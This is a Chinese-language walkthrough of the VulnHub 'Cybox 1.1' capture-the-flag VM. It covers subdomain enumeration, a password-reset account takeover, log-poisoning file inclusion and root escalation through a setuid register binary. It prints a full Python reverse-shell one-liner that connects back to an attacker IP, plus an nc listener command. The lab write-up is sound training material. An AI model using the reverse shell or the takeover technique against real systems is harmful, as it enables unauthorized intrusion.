vulnhub-Cybox: 1.1

由 admin 发布

靶机描述

Will you be able to compromise the internal server of the CYBOX company?

Difficulty: Medium

Objective: Get user.txt and root.txt

This works better with VirtualBox rather than VMware.

Contact: @takito1812

## Changelog 2020-12-06 - 1.1 2020-11-21 - 1.0

下载 https://www.vulnhub.com/entry/cybox-11,607/

清单

  • 信息搜集

    • gobuster
    • 越权更改密码
    • 文件包含
  • 提权

    • suid - register
    • sudo su root

信息搜集

靶机IP

端口扫描

nmap 192.168.34.152

Not shown: 993 filtered ports
PORT    STATE  SERVICE
21/tcp  open   ftp
25/tcp  open   smtp
53/tcp  closed domain
80/tcp  open   http
110/tcp open   pop3
143/tcp open   imap
443/tcp open   https

主页信息

image-20201225153941438

底部带有域名信息

将域名信息添加至 /etc/hosts

image-20201225154022252

目录扫描

---- Scanning URL: http://192.168.34.152/ ----
==> DIRECTORY: http://192.168.34.152/assets/                                                                                                                                                 
+ http://192.168.34.152/cgi-bin/ (CODE:403|SIZE:210)                                                                                                                                         
+ http://192.168.34.152/index.html (CODE:200|SIZE:8514)                                                                                                                                      
+ http://192.168.34.152/phpmyadmin (CODE:403|SIZE:92) 

子域名信息

gobuster vhost -u http://cybox.company/ -w /usr/share/wordlists/dirb/big.txt

Found: [.cybox.company (Status: 400) [Size: 226]
Found: dev.cybox.company (Status: 200) [Size: 209]
Found: ftp.cybox.company (Status: 200) [Size: 5295]
Found: monitor.cybox.company (Status: 302) [Size: 0]
Found: register.cybox.company (Status: 200) [Size: 1252]
Found: webmail.cybox.company (Status: 302) [Size: 0]

将信息添加至 /etc/hosts

192.168.34.152 cybox.company
192.168.34.152 dev.cybox.company
192.168.34.152 ftp.cybox.company
192.168.34.152 register.cybox.company
192.168.34.152 monitor.cybox.company
192.168.34.152 webmail.cybox.company

dev 为 phpinfo信息

ftp 为 ftp 服务器

register 为 一个创建用户的页面

monitor

image-20201225154540003

webmail

image-20201225154556666

1、使用 register 创建一个用户

2、在 monitor 使用找回密码功能

image-20201225154853961

3、在 处可以收到一份邮件

image-20201225154917713

将连接改为 admin@cybox.company 即可越权更改密码

4、在找回密码后,登陆来到monitor.cybox.company/admin/index.php

image-20201225155103790

image-20201225155140147

此处存在文件包含

验证

image-20201225155202799

在phpinfo信息中得到 apache 的访问日志

image-20201225155430836

文件包含后在信息中只看到了 ftp 页面的访问记录,所以需要在ftp页面抓包

开启burp

image-20201225155518632

修改请求头,尝试命令执行

验证

image-20201225155556549

低权限用户

1、开启监听

nc -lvp 443

2、反弹shell payload

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.34.158",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

得到shell

image-20201225160018943

cd /opt

ls -al

image-20201225160050744

Root

尝试创建一个用户

image-20201225155845725

尝试切换用户

su sudo

sudo # 密码

image-20201225155757325

ROOT

image-20201225155729697


暂无评论

发表评论